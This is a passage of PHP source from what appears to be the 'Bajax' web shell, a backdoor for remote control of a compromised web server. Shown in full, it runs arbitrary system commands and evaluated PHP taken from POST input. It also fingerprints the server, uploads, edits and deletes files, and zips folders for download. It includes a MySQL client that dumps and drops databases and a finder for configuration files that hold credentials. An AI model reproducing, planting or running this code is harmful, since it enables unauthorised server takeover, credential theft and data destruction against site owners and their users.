favicon);
header("Content-type:image/png");
header("Cache-control:public");
echo $data;
exit;
}
$r='';
$r.="
".php_uname()." ".$_SERVER['SERVER_SOFTWARE']." ".get_current_user()." Server Ip : ".gethostbyname($_SERVER['HTTP_HOST'])." Your IP : ".$_SERVER['REMOTE_ADDR']." ".$this->drive()."
";
return $r;
}
function menu ()
{
$r='';
$menu=array("[ Files ]"=>"?act=file&dir=".$this->dir()."", "[ Mysql ]"=>"?act=mysql&dir=".$this->dir()."","Info.Ser"=>"?act=ser&dir=".$this->dir()."", "Encoder"=>"?act=encode&dir=".$this->dir()."", "Writable Dir"=>"?act=write&dir=".$this->dir()."","BD Scanner"=>"?act=bds&dir=".$this->dir()."","Config Finder"=>"?act=loc&dir=".$this->dir(),"Search File"=>"?act=search&dir=".$this->dir(),"Logout"=>"?act=out");
$r.="";
return $r;
}
function logo() {
$r='';
$r.="
___________
\______ \_____ |__|____ ___ ___
| | _/\__ \ | \__ \ \ \/ /
| | \ / __ \_ | |/ __ \_> <
|______ /(____ /\__| (____ /__/\_ \
\/ \/\______| \/ \/
";
return $r;
}
function footer()
{
$r='';
$r.="
";
return $r;
}
function xpl() {
$r='';
if ($_POST['aksi']=='download' && $_POST['pilih']>0) {
$this->get_selected($_POST['pilih']);
} elseif ($_POST['aksi'] =='delete' && $_POST['pilih']>0) {
$this->del_selected($_POST['pilih']);
}
$dname=array();
$fname=array();
if ($dh=opendir($this->dir())) {
while(false !==($name=readdir($dh))) {
if($name !='.') {
(is_dir($name))?$dname[]=$name:$fname[]=$name;
}
}
closedir($dh);
}
sort($dname);
sort($fname);
$no=0;
$r.="$d[$i]":$r.="$d[$i]".DIRECTORY_SEPARATOR." ");
}
return $r;
}
function getsize($s) {
if(!$s) return 0;
if($s>=1073741824) return(round($s/1073741824,2)." GB");
elseif($s>=1048576) return(round($s/1048576,2)." MB");
elseif($s>=1024) return(round($s/1024,2)." KB");
else return($s." B");
}
function foldersize($path) {
$total_size = 0;
$files = scandir($path);
$cleanPath = rtrim($path, '/'). '/';
foreach($files as $t) {
if ($t<>"." && $t<>"..") {
$currentFile = $cleanPath . $t;
if (is_dir($currentFile)) {
$size = $this->foldersize($currentFile);
$total_size += $size;
}
else {
$size = filesize($currentFile);
$total_size += $size;
}
}
}
return $total_size;
}
function converter()
{
$r='';
$r.="";
$opt=array("MD5"=>"md5","Hex"=>"hexa","Base64 Encoder"=>"64en","Base64 Decoder"=>"64de","SHA1"=>"sha1","URL Encoder"=>"urlen","URL Decoder"=>"urlde");
if(isset($_POST['submit'])&&!empty($_POST['convert']))
{
$val=$this->convert($_POST['isi']);
$r.="";
}
$isi="
";
return $r;
}
function convert($isi)
{
$i=$_POST['convert'];
switch ($isi) {
case 'md5':$c=md5($i);return $c;break;
case 'hexa':$c=bin2hex($i);return $c;break;
case '64en':$c=base64_encode($i);return $c;break;
case '64de':$c=base64_decode($i);return $c;break;
case 'sha1':$c=sha1($i);return $c;break;
case 'urlen':$c=urlencode($i);return $c;break;
case 'urlde':$c=urldecode($i);return $c;break;
}
}
function infoser()
{
$r="";
$r.="Disable Function : ".(ini_get('disable_functions')?ini_get('disable_functions'):"All Function Enable")." ";;
$r.="Safe Mode : ".(ini_get('safe_mode')?"On":"Off")." ";
$r.="Open Base Dir : ".ini_get('openbase_dir')." ";
$r.="Php version : ".phpversion()." ";
$r.="Register Global : ".(ini_get('register_global')?'Enable':'Disable')." ";
$r.="Curl : ".(extension_loaded('curl')?'Enable':'Disable')." ";
$r.="Database Mysql : ".(function_exists('mysql_connect')?'On':'Off')." ";
$r.="Magic Quotes : ".(ini_get('Magic_Quotes')?'On':'Off')." ";
$r.="Remote Include : ".(ini_get('allow_url_include')?'Enable':'Disable')." ";
$r.="Disk Free Space : ".$this->getSize(diskfreespace($this->dir()))." ";
$r.="Total Disk Space : ".$this->getSize(disk_total_space($this->dir()))." ";
$r.="
";
return $r;
}
function replace($dir) {
return str_replace('\\','/', $dir);
}
function center()
{
$r='';
$r.='';
return $r;
}
function drive() {
$r='';
foreach (range("A", "Z") as $val) {
if(is_dir($val.":".DIRECTORY_SEPARATOR))
{
$ad=$val.":".DIRECTORY_SEPARATOR;
$r=$r.="$val:".DIRECTORY_SEPARATOR." ";
}
}
return $r;
}
function dir() {
if(isset($_GET['dir'])) {
$dir =$_GET['dir'];
if(is_dir($dir)){
chdir($dir);
return $dir;
}
}
else {
return getcwd().DIRECTORY_SEPARATOR;
}
}
function remdir() {
if(is_writable($_REQUEST['file']))
{
$dir=$_GET['file'];
$this->deleteDirectory($dir);
}
else{return $this->alert("Permission Denied !");}
}
function remfile()
{
$file=$_GET['file'];
if(is_file($file)){
unlink($file);
}else{ return $this->alert("Permission Denied");}
}
function editfile($file)
{
if(!empty($_POST['rename']))
{
rename($_POST['file'],$_POST['rename']);
}
$fp=fopen($_POST['rename'],'w');
if(!$fp)return 0;
fwrite($fp, stripslashes($_POST['isi']));
fclose($fp);return 1;
}
//rename file to new name
function rename($file)
{
if(!empty($_POST['rename']))
{
if(rename($_POST['file'],$_POST['rename']));
return 1;return 0;
}
}
function alert($text) {
$r="";
return $r;
}
function deleteDirectory($dir) {
if (!file_exists($dir)) return true;
if (!is_dir($dir) || is_link($dir)) return unlink($dir);
foreach (scandir($dir) as $item) {
if ($item == '.' || $item == '..') continue;
if (!$this->deleteDirectory($dir . "/" . $item)) {
chmod($dir . "/" . $item, 0777);
if (!$this->deleteDirectory($dir . "/" . $item)) return false;
};}return rmdir($dir);
}
function createfile() {
if(!empty($_POST['file'])) {
$fp=fopen($this->replace($this->dir.$_POST['file']),"w");
if($fp)
{
fclose($fp);
$r= $this->alert("file Created");
}
}
return $r;
}
function mkdir()
{
if(!empty($_POST['dir']))
{
if(mkdir($this->replace($this->dir()).$_POST['dir']))
return true;else return "Permission Denied";
}
}
function upload()
{
$r='';
if(!empty($_FILES['berkas']))
{
$dest=$this->replace($_POST['tujuan']);
$name=$dest.$_FILES['berkas']['name'];
if(move_uploaded_file($_FILES['berkas']['tmp_name'],$name))
return true;else $r.= $this->alert("failed");
}
return $r;
}
function seval($c) {
ob_start();
eval($c.";");
$h=ob_get_contents();
ob_end_clean();
return $h;
}
function phpeval() {
$r='';
$r.='';
if(isset($_POST['submit'])&&!empty($_POST['eval']))
{
$r.=htmlspecialchars($this->seval($_POST['eval']));
}
else $r.=header("location:?act=file&dir=".$this->dir());
$r.='
';
return $r;
}
function execution($r) {
if(function_exists('system'))
{
ob_start();
system($r);
$s=ob_get_contents();
ob_end_clean();
return $s;
}
elseif(function_exists('passthru'))
{
ob_start();
passthru($r);
$s=ob_get_contents();
ob_clean();
return $s;
}
elseif(function_exists('exec'))
{
$s='';
exec($r,$h);
foreach ($h as $hasil) {
$s.=$hasil;
}
return $s;
}
elseif(function_exists('shell_exec'))
{
$s=shell_exec($r);
return $s;
}
return "All function Disable";
}
function command() {
$r='';
$r.='';
if(!empty($_POST['cmd']))
{
$r.="
".$this->execution($_POST['cmd'])." ";
$r.="
";
}
else $r.=header("location:?act=file&dir=".$this->dir());
return $r;
}
function del_selected($files) {
$r='';
foreach ($files as $file) {
if (is_dir($file)) {
if (is_writable($file)) {
$this->deleteDirectory($file);
} else {
$r.=$this->alert('permission denied');
}
} elseif(is_file($file)) {
if (is_writable($file)) {
unlink($file);
} else {
$r.=$this->alert('permission denied');
}
}
}
return $r;
}
function add_dir($name) {
$name = str_replace("\\", "/", $name);
$fr = "\x50\x4b\x03\x04";
$fr .= "\x0a\x00";
$fr .= "\x00\x00";
$fr .= "\x00\x00";
$fr .= "\x00\x00\x00\x00";
$fr .= pack("V",0);
$fr .= pack("V",0);
$fr .= pack("V",0);
$fr .= pack("v", strlen($name) );
$fr .= pack("v", 0 );
$fr .= $name;
$fr .= pack("V",$crc);
$fr .= pack("V",$c_len);
$fr .= pack("V",$unc_len);
$this -> datasec[] = $fr;
$new_offset = strlen(implode("", $this->datasec));
$cdrec = "\x50\x4b\x01\x02";
$cdrec .="\x00\x00";
$cdrec .="\x0a\x00";
$cdrec .="\x00\x00";
$cdrec .="\x00\x00";
$cdrec .="\x00\x00\x00\x00";
$cdrec .= pack("V",0);
$cdrec .= pack("V",0);
$cdrec .= pack("V",0);
$cdrec .= pack("v", strlen($name) );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$ext = "\x00\x00\x10\x00";
$ext = "\xff\xff\xff\xff";
$cdrec .= pack("V", 16 );
$cdrec .= pack("V", $this -> old_offset );
$this -> old_offset = $new_offset;
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function add_file($data, $name)
{
$name = str_replace("\\", "/", $name);
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= "\x00\x00\x00\x00";
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr( substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr .= pack("V",$crc);
$fr .= pack("V",$c_len);
$fr .= pack("V",$unc_len);
$fr .= pack("v", strlen($name) );
$fr .= pack("v", 0 );
$fr .= $name;
$fr .= $zdata;
$fr .= pack("V",$crc);
$fr .= pack("V",$c_len);
$fr .= pack("V",$unc_len);
$this -> datasec[] = $fr;
$new_offset = strlen(implode("", $this->datasec));
$cdrec = "\x50\x4b\x01\x02";
$cdrec .="\x00\x00";
$cdrec .="\x14\x00";
$cdrec .="\x00\x00";
$cdrec .="\x08\x00";
$cdrec .="\x00\x00\x00\x00";
$cdrec .= pack("V",$crc);
$cdrec .= pack("V",$c_len);
$cdrec .= pack("V",$unc_len);
$cdrec .= pack("v", strlen($name) );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("V", 32 );
$cdrec .= pack("V", $this -> old_offset );
$this -> old_offset = $new_offset;
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function file() {
$data = implode("", $this -> datasec);
$ctrldir = implode("", $this -> ctrl_dir);
return
$data.
$ctrldir.
$this -> eof_ctrl_dir.
pack("v", sizeof($this -> ctrl_dir)).
pack("v", sizeof($this -> ctrl_dir)).
pack("V", strlen($ctrldir)).
pack("V", strlen($data)).
"\x00\x00";
}
function get_files_from_folder($directory, $put_into) {
$sp=DIRECTORY_SEPARATOR;
if ($handle = opendir($directory)) {
while (false !== ($file = readdir($handle))) {
if (is_file($directory.$file)) {
$fileContents = file_get_contents($directory.$file);
$this->add_file($fileContents, $put_into.$file);
}
elseif ($file != '.' && $file != '..' && is_dir($directory.$file))
{
$this->add_dir($put_into.$file.$sp);
$this->get_files_from_folder($directory.$file.$sp, $put_into.$file.$sp);
}
}
}
closedir($handle);
}
function get_selected_file($files, $put_into) {
$sp=DIRECTORY_SEPARATOR;
foreach ($files as $file) {
if (is_file($file)) {
$fileContents = file_get_contents($this->dir().$file);
$this->add_file($fileContents, $put_into.$file);
}
elseif (is_dir($file)) {
$fd=basename($file).DIRECTORY_SEPARATOR;
if ($handle = opendir($file)) {
while (false !== ($val = readdir($handle))) {
if (is_file($file.$val)) {
$fileContents = file_get_contents($file.$val);
$this->add_file($fileContents, $put_into.$fd.$val);
}
elseif ($val != '.' && $val != '..' && is_dir($file.$val))
{
$this->add_dir($put_into.$fd.$val.$sp);
$this->get_files_from_folder($file.$val.$sp, $put_into.$fd.$val.$sp);
}
}
}
closedir($handle);
}
}
}
function get_selected($file) {
$this->get_selected_file($file, '');
header("Content-Disposition: attachment; filename=" .$this->cs(basename($this->dir()))."-".".zip");
header("Content-Type: application/download");
header("Content-Length: " . strlen($this -> file()));
flush();
echo $this -> file();
exit();
}
function downloadfile($f)
{
$fl=file_get_contents($f);
header("Content-type:application/octet-stream");
header("Content-length:".strlen($fl));
header("Content-Disposition:attachment;filename=".$this->cs(basename($f)));
echo $fl;
exit;
}
function downloadfolder($fd) {
$this->get_files_from_folder($fd,'');
header("Content-Disposition: attachment; filename=" .$this->cs(basename($fd))."-".".zip");
header("Content-Type: application/download");
header("Content-Length: " . strlen($this -> file()));
flush();
echo $this -> file();
exit();
}
function cs($t) {
return str_replace(" ","_",$t);
}
function lihat($file) {
$r='';
$r.="Action
Edit | Download
| Del ";
$r.="";
$file = wordwrap(file_get_contents($file),"240","\n");
$li= highlight_string($file,true);
$old = array("0000BB","000000","FF8000","DD0000", "007700");
$new = array("4C83AF","888888", "87DF45", "EEEEEE" , "FF8000");
$r.= str_replace($old,$new, $li);
$r.="
";
return $r;
}
function edit($file) {
$d=$this->dir();
$fp = fopen($file,'r');
if (!$fp)
return false;
$r = '';
$r .= '
'.'';
$r .= ''.(htmlspecialchars(fread($fp, filesize($file)))).' ';
$r .= 'Rename : ';
$r .= ' ';
fclose($fp);
return $r;
}
function ren($file) {
$d=$this->dir();
$r='';
$r.="
";
$r.=' ';
$r.=' To ';
return $r;
}
function login() {
if(!isset($_SESSION['login'])&&!isset($_POST['masuk']))
{
$r='';
$r.= '
Host : Username : Password ';
return $r;
}
elseif(!isset($_SESSION['login'])&&isset($_POST['masuk']))
{
extract($_POST);
$this->pdo=$this->pdo_con($host,$port,$user,$pass);
if (strpos($this->pdo,"error")===false) {
$_SESSION['host']=$_POST['host'];
$_SESSION['port']=$_POST['port'];
$_SESSION['user']=$_POST['user'];
$_SESSION['pass']=$_POST['pass'];
$_SESSION['login']=true;
header("location:?act=view&dir=".$this->dir()."");
} else {
header("location:?act=mysql");
}
}
else header("location:?act=view&dir=".$this->dir()."");
}
function connector($db=NULL) {
extract($_SESSION);
try {
$this->pdo = new PDO("mysql:host=$host;dbname=$db;port=$port", "$user","$pass" );
$this->pdo->setAttribute( PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION );
}
catch( PDOException $e ) {
return "error ". $e->getMessage();
}
}
function pdo_con($host,$port,$user,$pass) {
try {
$this->pdo = new PDO("mysql:host=$host;port=$port", "$user","$pass" );
$this->pdo->setAttribute( PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION );
}
catch( PDOException $e ) {
return "error ". $e->getMessage();
}
}
function check() {
if (strpos($this->connector(), "error")===false) {
return true;
} else {
return false;
}
}
function qe( $sql,$data=null) {
if ($data!==null) {
$dat=array_values($data);
}
$sel = $this->pdo->prepare( $sql );
if ($data!==null) {
$sel->execute($dat);
} else {
$sel->execute();
}
$sel->setFetchMode( PDO::FETCH_OBJ );
return $sel;
}
function qer2( $sql) {
$sel = $this->pdo->prepare( $sql );
$sel->execute();
$sel->setFetchMode( PDO::FETCH_ASSOC );
return $sel;
}
function qer( $sql) {
$sel = $this->pdo->prepare( $sql );
$sel->execute();
return $sel;
}
function insert($table,$dat) {
if( $dat !== null )
$data = array_values( $dat );
$cols=array_keys($dat);
$col=implode(', ', $cols);
$mark=array();
foreach ($data as $key) {
$keys='?';
$mark[]=$keys;
}
$im=implode(', ', $mark);
$ins = $this->pdo->prepare("INSERT INTO $table ($col) values ($im)");
$ins->execute( $data );
}
function update($table,$dat,$id,$val) {
if( $dat !== null )
$data = array_values( $dat );
array_push($data,$val);
$cols=array_keys($dat);
$mark=array();
foreach ($cols as $col) {
$mark[]=$col."=?";
}
$im=implode(', ', $mark);
$ins = $this->pdo->prepare("UPDATE $table SET $im where $id=?");
$ins->execute( $data );
}
function toArray($d) {
if (is_object($d)) {
$d = get_object_vars($d);
}
if (is_array($d)) {
return array_map(array($this,'toArray'), $d);
}
else {
return $d;
}
}
function close()
{
$r=$this->pdo = null;
return $r;
}
function logout() {
extract($_SESSION);
return "$user@$host Logout ";
}
function lihatdb() {
$r='';
$c=$this->check();
if($c==true) {
$r.=$this->logout();
$r.="";
}
else {
session_destroy();
$r.="gagal brow";
}
$this->close();
return $r;
}
function showtable() {
$db=$_GET['db'];
$c=$this->connector($db);
$r='';
$r.=$this->logout();
$r.="
Show Database
Table Name Table Type Column count Size Dump Drop ";
$query=$this->qe("SHOW TABLE STATUS");
foreach ($query as $data) {
$iml=$this->qe("SHOW COLUMNS FROM $data->Name");
$name=$data->Name;
$ni=$data->Data_length+$data->Index_length;
$h=($iml->rowCount())?$iml->rowCount():0;
$r.= "$name ".($data->Comment?$data->Comment:"TABLE ")." $h ".$this->getSize($ni)." Dump Drop ";
}
$r.= "
";
return $r;
$this->close();
}
function editrow() {
$c=$this->connector($_GET['db']);
$r='';
$r.=$this->logout();
$db=$_GET['db'];
$tbl=$_GET['table'];
$val=$_GET['val'];
$col=$_GET['col'];
$r.="";
return $r;
}
function updaterow() {
$this->connector($_GET['db']);
$db=$_GET['db'];
$tbl=$_GET['table'];
$val=$_GET['val'];
$col=$_GET['col'];
array_pop($_POST);
$res=$this->update($tbl,$_POST,$col,$val);
($res=false?$r.="you can't do that":$r.="Updated");
$r.=header("location:?act=showcon&db=$db&table=$tbl");
}
function showcon() {
$db=$_GET['db'];
$c=$this->connector($db);
$r='';
$r.=$this->logout();
$tbl=$_GET['table'];
$r.="Show Tables ";
$query=$this->qe("SELECT * FROM $tbl");
$col=array();
$iml=$this->qe("SHOW COLUMNS FROM $tbl");
$r.=" ";
foreach ($iml as $c) {
array_push($col,$c->Field);
$r.="".strtoupper($c->Field)." ";
}
$r.="Action ";
$row=$query->rowCount();
$perpage=50;
$lastpage=ceil($row/$perpage);
$range=10;
$page=(isset($_GET['page']))?(int)$_GET['page']:1;
if ($page<1) {
$page=1;
} elseif ($page>$lastpage) {
$page=$lastpage;
}
$offset=($page-1)*$perpage;
$no=$offset;
if ($row <=50) {
$query2=$this->qe("SELECT * FROM $tbl");
} else {
$query2=$this->qe("SELECT * FROM $tbl limit $offset,$perpage");
}
if ($page<6 && $lastpage > $range) {
$start=1;
} elseif($page > 5 &&$lastpage >$range) {
$start=$page-5;
} else {
$start=$lastpage-9;
}
if ($page > 5 && $lastpage > $range) {
$end=$page+4;
} else {
$end=$range;
}
foreach ($query2 as $data) {
$cols=$iml->rowCount();
$r.="";
foreach ($data as $da) {
if ($da=='') {
$r.=" ";
} else {
$r.="$da ";
}
}
$isi=array();
foreach ($data as $isi_val) {
$isi[]=$isi_val;
}
$r.="Edit | Delete ";
$r.=" ";
}
$r.="
";
if ($row>=50) {
$r.= "
page $page of $lastpage";
$r.= " Previous ";
for ($i=$start; $i <=$end ; $i++) {
if ($i>0 && $i<=$lastpage) {
if ($page==$i) {
$r.= "$i ";
}else {
$r.= "$i ";
}
}
}
$r.= "Next ";
}
$r.= "
";
return $r;
}
function insertrow() {
$db=$_GET['db'];
$this->connector($db);
$db=$_GET['db'];
$tbl=$_GET['table'];
$r='';
if(!isset($_POST['kirim']))
{
$r.="";
return $r;
} else {
array_pop($_POST);
array_pop($_POST);
$this->insert($tbl,$_POST);
($qu=false?$r.="Failed brow":$r.="Success");
$r.="";
}
return $r;
}
function droprow() {
$this->connector($_GET['db']);
$this->qe("DELETE FROM $_GET[table] WHERE $_GET[col]='$_GET[val]'");
$r.=header("location:?act=showcon&db=$_GET[db]&table=$_GET[table]");
}
function createdb($name) {
$this->connector();
if(!empty($name))
{
$q=$this->qe("CREATE DATABASE $name");
(!$q?$r.=mysql_error():$r.="Good Brow");
}
else $r.="Fill DB Name";
return $r;
}
function dropsql() {
$this->connector();
if(!isset($_GET['tbl'])){
$d=$this->qe("DROP DATABASE $_GET[db]");
header("location:?act=mysql");
}
elseif(isset($_GET['db'])&&isset($_GET['tbl']))
{
$this->qe("DROP TABLE $_GET[db].$_GET[tbl]");
header("location:?act=showtable&db=$_GET[db]");
}
}
function downdb()
{
$db=$_GET['db'];
$c=$this->connector($db);
$r='';
if (isset($_GET['db'])&&!isset($_GET['table'])) {
$r.="--------------------------------\n";
$r.="-- =========================Bajax Mysql Dumper =============================\n-- Database : `$db`\n";
$r.="-------------------------------\n\n";
$pr=array();
$fun=array();
$show_table=$this->qe("SHOW PROCEDURE status where db='test'");
foreach ($show_table as $key) {
if (count($key)>0) {
$proc=$this->qer("SHOW CREATE PROCEDURE test.$key->Name");
foreach ($proc as $proced) {
$pr[]=$proced[2];
}
}
}
$show_table=$this->qe("SHOW FUNCTION status where db='test'");
foreach ($show_table as $key) {
if (count($key)>0) {
$proc=$this->qer("SHOW CREATE FUNCTION test.$key->Name");
foreach ($proc as $proceds) {
$fun[]=$proced[2];
}
}
}
$pro_func='';
if (count($pr)>0 OR count($fun)>0) {
$pro_func.="DELIMITER $$\n\n";
if (count($pr)>0) {
$pro_func.="--\n";
$pro_func.="-- PROCEDURE\n";
$pro_func.="--\n";
foreach ($pr as $procedure) {
$pro_func.=$procedure."$$\n\n";
}
}
if (count($fun)>0) {
$pro_func.="--\n";
$pro_func.="-- FUNCTION\n";
$pro_func.="--\n";
foreach ($fun as $funct) {
$pro_func.=$funct."$$\n\n";
}
}
$pro_func.="DELIMITER ;\n\n";
}
$r.=$pro_func;
$table=array();
$table_name=$this->qe("SHOW TABLE STATUS");
foreach ($table_name as $d) {
$table[]=$d->Name;
}
$status=array();
$stats=$this->qe("SHOW TABLE STATUS");
foreach ($stats as $stat) {
$stats=array($stat->Name=>"");
foreach ($stats as $key => $value) {
if ($stat->Engine!=''&&$stat->Auto_increment!='') {
$status[]="ENGINE=".$stat->Engine." DEFAULT COLLATE=".$stat->Collation." AUTO_INCREMENT=".$stat->Auto_increment;
}elseif ($stat->Engine!='') {
$status[]="ENGINE=".$stat->Engine." DEFAULT COLLATE=".$stat->Collation;
}else {
$status[]='';
}
}
}
foreach ($table as $tab) {
$cols=$this->qe("SHOW COLUMNS FROM $tab");
$inds=$this->qe("SHOW INDEX FROM $tab");
$r.= "--\n";
$r.= "-- Table structure for table `$tab`\n";
$r.= "--\n\n";
$r.= "CREATE TABLE IF NOT EXISTS `$tab` (\n";
$c='';
foreach ($cols as $col) {
$c.= "`$col->Field` $col->Type ";
if($col->Null=='YES' && $col->Default=='') {
$c.= "DEFAULT NULL";
}elseif($col->Null=='NO') {
$c.= 'NOT NULL';
}elseif ($col->Null=='YES'&&$col->Default!='') {
$c.= "DEFAULT $col->Default";
}
if ($col->Extra!='') {
$c.= " ".strtoupper($col->Extra);
}
$c.= ", \n";
}
$ar=array();
foreach ($inds as $key) {
$ar[]=$key;
}
$sr=array();
$s=$this->toArray($ar);
foreach ($s as $key) {
if (strpos($key['Key_name'],"PRIMARY")!==false) {
$sr[]= "PRIMARY KEY "."(`$key[Column_name]`)";
}elseif (strpos($key['Key_name'], "FK")!==false) {
$sr[]="KEY "."`$key[Key_name]` (`$key[Column_name]`)";
}
}
$imp=implode(", \n", $sr);
if ($imp=='') {
$r.= substr($c, 0,-3)."\n";
} else {
$r.= $c.$imp."\n";
}
$r.= ")";
foreach ($status as $key => $value) {
if ($tab==$key) {
$r.= $value.";\n\n";
}
}
$select=$this->qer2("SELECT * FROM $tab");
foreach ($select as $data) {
if (!empty($data)) {
$col=implode(', ',array_keys($data));
$val=implode("', '",array_values($data));
$r.= "INSERT INTO `$tab` ($col) VALUES ('$val');\n";
}
}
$r.= "\n";
}
$view=array();
$views=$this->qer("SHOW FULL TABLES where Table_type like 'VIEW'");
foreach ($views as $ve) {
$view[]=$ve;
}
if (count($view)>0) {
foreach ($view as $view_name) {
$view_create=$this->qer("SHOW CREATE VIEW $view_name[0]");
foreach ($view_create as $create_view) {
echo "DROP TABLE IF EXISTS `$view_name[0]`;\n".$create_view[1].";\n\n";
}
}
}
$index2=array();
foreach ($table as $tab2) {
if (count($tab2)>0) {
$find_const=$this->qer("SHOW CREATE TABLE $tab2");
foreach ($find_const as $got_const) {
$tmp=strstr($got_const[1], "CONSTRAINT")."\n";
preg_match_all("/(.*)\\n/", $tmp, $match);
if (count($tmp)>0) {
$index2[]="ALTER TABLE `$tab2` ADD ".$match[0][0].";";
}
}
}
}
if (count($index2)>0) {
foreach ($index2 as $constraint) {
if (strpos($constraint, "CONSTRAINT")!==FALSE) {
$r.= $constraint."\n";
}
}
}
}
//downloading database
elseif(isset($_GET['db'])&&isset($_GET['table']))
{
$r='';
$tbl=$_GET['table'];
$r.="-- =========================Bajax Table Dumper =============================\n-- Database : `$db`\n\n";
$r.="--\n";
$r.="--Table or view structure for `$tbl`\n";
$r.="--\n\n";
$checks=$this->qer("SHOW CREATE TABLE $tbl");
foreach ($checks as $check) {
$r.=$check[1]."\n";
}
$checks=$this->qer("SHOW FULL TABLES");
foreach ($checks as $check_type) {
if ($check_type[0]==$tbl&&$check_type[1]=='BASE TABLE') {
$select=$db->qer2("SELECT * FROM $tbl");
foreach ($select as $data) {
if (!empty($data)) {
$col=implode(', ',array_keys($data));
$val=implode("', '",array_values($data));
$r.="INSERT INTO `$tbl` ($col) VALUES ('$val');\n";
}
}
}
}
}
else echo "i don't know brow";
(!isset($tbl)?$name="$db.sql":$name="$db.$tbl.sql");
ob_get_clean();
header("Content-type:application/octet-stream");
header("Content-length:".strlen($r));
header("Content-Disposition:attachment;filename=$name;");
echo $r;
exit();
}
function downstruc() {
$db=$_GET['db'];
$c=$this->connector($db);
$r='';
if(isset($_GET['db'])&&!isset($_GET['tbl'])) {
$r.="--------------------------------\n";
$r.="-- =========================Bajax Mysql Dumper Structures =============================\n-- Database : `$db`\n";
$r.="-------------------------------\n\n";
$pr=array();
$fun=array();
$show_table=$this->qe("SHOW PROCEDURE status where db='test'");
foreach ($show_table as $key) {
if (count($key)>0) {
$proc=$this->qer("SHOW CREATE PROCEDURE test.$key->Name");
foreach ($proc as $proced) {
$pr[]=$proced[2];
}
}
}
$show_table=$this->qe("SHOW FUNCTION status where db='test'");
foreach ($show_table as $key) {
if (count($key)>0) {
$proc=$this->qer("SHOW CREATE FUNCTION test.$key->Name");
foreach ($proc as $proceds) {
$fun[]=$proced[2];
}
}
}
$pro_func='';
if (count($pr)>0 OR count($fun)>0) {
$pro_func.="DELIMITER $$\n\n";
if (count($pr)>0) {
$pro_func.="--\n";
$pro_func.="-- PROCEDURE\n";
$pro_func.="--\n";
foreach ($pr as $procedure) {
$pro_func.=$procedure."$$\n\n";
}
}
if (count($fun)>0) {
$pro_func.="--\n";
$pro_func.="-- FUNCTION\n";
$pro_func.="--\n";
foreach ($fun as $funct) {
$pro_func.=$funct."$$\n\n";
}
}
$pro_func.="DELIMITER ;\n\n";
}
$r.=$pro_func;
$table=array();
$table_name=$this->qe("SHOW TABLE STATUS");
foreach ($table_name as $d) {
$table[]=$d->Name;
}
$status=array();
$stats=$this->qe("SHOW TABLE STATUS");
foreach ($stats as $stat) {
$stats=array($stat->Name=>"");
foreach ($stats as $key => $value) {
if ($stat->Engine!=''&&$stat->Auto_increment!='') {
$status[]="ENGINE=".$stat->Engine." DEFAULT COLLATE=".$stat->Collation." AUTO_INCREMENT=".$stat->Auto_increment;
}elseif ($stat->Engine!='') {
$status[]="ENGINE=".$stat->Engine." DEFAULT COLLATE=".$stat->Collation;
}else {
$status[]='';
}
}
}
foreach ($table as $tab) {
$cols=$this->qe("SHOW COLUMNS FROM $tab");
$inds=$this->qe("SHOW INDEX FROM $tab");
$r.= "--\n";
$r.= "-- Table structure for table `$tab`\n";
$r.= "--\n\n";
$r.= "CREATE TABLE IF NOT EXISTS `$tab` (\n";
$c='';
foreach ($cols as $col) {
$c.= "`$col->Field` $col->Type ";
if($col->Null=='YES' && $col->Default=='') {
$c.= "DEFAULT NULL";
}elseif($col->Null=='NO') {
$c.= 'NOT NULL';
}elseif ($col->Null=='YES'&&$col->Default!='') {
$c.= "DEFAULT $col->Default";
}
if ($col->Extra!='') {
$c.= " ".strtoupper($col->Extra);
}
$c.= ", \n";
}
$ar=array();
foreach ($inds as $key) {
$ar[]=$key;
}
$sr=array();
$s=$this->toArray($ar);
foreach ($s as $key) {
if (strpos($key['Key_name'],"PRIMARY")!==false) {
$sr[]= "PRIMARY KEY "."(`$key[Column_name]`)";
}elseif (strpos($key['Key_name'], "FK")!==false) {
$sr[]="KEY "."`$key[Key_name]` (`$key[Column_name]`)";
}
}
$imp=implode(", \n", $sr);
if ($imp=='') {
$r.= substr($c, 0,-3)."\n";
} else {
$r.= $c.$imp."\n";
}
$r.= ")";
foreach ($status as $key => $value) {
if ($tab==$key) {
$r.= $value.";\n\n";
}
}
$r.= "\n";
}
$view=array();
$views=$this->qer("SHOW FULL TABLES where Table_type like 'VIEW'");
foreach ($views as $ve) {
$view[]=$ve;
}
if (count($view)>0) {
foreach ($view as $view_name) {
$view_create=$this->qer("SHOW CREATE VIEW $view_name[0]");
foreach ($view_create as $create_view) {
echo "DROP TABLE IF EXISTS `$view_name[0]`;\n".$create_view[1].";\n\n";
}
}
}
$index2=array();
foreach ($table as $tab2) {
if (count($tab2)>0) {
$find_const=$this->qer("SHOW CREATE TABLE $tab2");
foreach ($find_const as $got_const) {
$tmp=strstr($got_const[1], "CONSTRAINT")."\n";
preg_match_all("/(.*)\\n/", $tmp, $match);
if (count($tmp)>0) {
$index2[]="ALTER TABLE `$tab2` ADD ".$match[0][0].";";
}
}
}
}
if (count($index2)>0) {
foreach ($index2 as $constraint) {
if (strpos($constraint, "CONSTRAINT")!==FALSE) {
$r.= $constraint."\n";
}
}
}
$name="$db.sql";
ob_get_clean();
header("Content-type:application/octet-stream");
header("Content-length:".strlen($r));
header("Content-Disposition:attachment;filename=$name;");
echo $r;
exit();
}
}
function locate() {
$r="";
if (isset($_POST['cari'])) {
$r.="
These Files Probably config File ";
$r.=$this->loc($_POST['addr']);
$r.="
";
}else {
$r="
Find config file
".$this->current('loc')."
";
}
$r.="
";
return $r;
}
function loc($dir) {
$r='';
if($files = @scandir($dir)) {
foreach($files as $file) {
if($file != '.' && $file != '..') {
if(@is_dir($dir."\\".$file)) {
